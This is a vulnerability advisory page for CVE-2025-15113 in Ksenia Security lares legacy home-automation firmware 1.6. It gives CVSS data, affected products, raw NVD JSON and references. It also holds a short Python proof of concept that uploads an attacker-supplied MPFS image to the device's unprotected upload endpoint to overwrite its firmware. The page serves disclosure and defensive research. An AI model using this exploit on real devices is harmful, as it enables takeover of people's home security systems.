Security Vulnerability Report
中文
CVE-2025-15113 CVSS 9.3 CRITICAL

CVE-2025-15113

Published: 2025-12-30 23:15:50
Last Modified: 2026-03-11 20:16:13
Source: [email protected]

Description

Ksenia Security lares (legacy model) Home Automation version 1.6 contains an unprotected endpoint vulnerability that allows authenticated attackers to upload MPFS File System binary images. Attackers can exploit this vulnerability to overwrite flash program memory and potentially execute arbitrary code on the home automation system's web server.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:* - NOT VULNERABLE
Ksenia Security lares (legacy model) Home Automation version 1.6
所有未修补的legacy系列固件版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-15113 PoC - Ksenia Security lares MPFS Upload RCE # Target: Ksenia Security lares (legacy model) Home Automation def exploit_mpfs_upload(target_ip, malicious_mpfs_file): """ Exploit the unprotected MPFS upload endpoint """ upload_url = f"http://{target_ip}/mpfs_upload" try: with open(malicious_mpfs_file, 'rb') as f: mpfs_data = f.read() files = {'mpfs_image': ('exploit.mpfs', mpfs_data, 'application/octet-stream')} print(f"[*] Uploading malicious MPFS to {target_ip}...") response = requests.post(upload_url, files=files, timeout=30) if response.status_code == 200: print("[+] MPFS upload successful!") print("[*] Device will now load the malicious filesystem...") print("[*] Reboot device to trigger payload execution") return True else: print(f"[-] Upload failed with status: {response.status_code}") return False except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) != 3: print(f"Usage: python {sys.argv[0]} <target_ip> <malicious_mpfs_file>") sys.exit(1) target = sys.argv[1] mpfs_file = sys.argv[2] exploit_mpfs_upload(target, mpfs_file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15113", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:49.913", "lastModified": "2026-03-11T20:16:13.410", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Ksenia Security lares (legacy model) Home Automation version 1.6 contains an unprotected endpoint vulnerability that allows authenticated attackers to upload MPFS File System binary images. Attackers can exploit this vulnerability to overwrite flash program memory and potentially execute arbitrary code on the home automation system's web server."}, {"lang": "es", "value": "Ksenia Security Lares 4.0 Home Automation versión 1.6 contiene una vulnerabilidad de endpoint desprotegido que permite a atacantes autenticados cargar imágenes binarias del sistema de archivos MPFS. Los atacantes pueden explotar esta vulnerabilidad para sobrescribir la memoria de programa flash y potencialmente ejecutar código arbitrario en el servidor web del sistema de automatización del hogar."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 6.0}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-256"}]}, {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "DF94F084-2F13-427A-9CB5-9E3E95621C8B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "DDE71F37-880F-4534-80FF-A2BE3D8E2AD4"}]}]}], "references": [{"url": "https://packetstorm.news/files/id/190178/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.kseniasecurity.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ksenia-security-lares-home-automation-remote-code-execution-via-mpfs-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5930.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5930.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.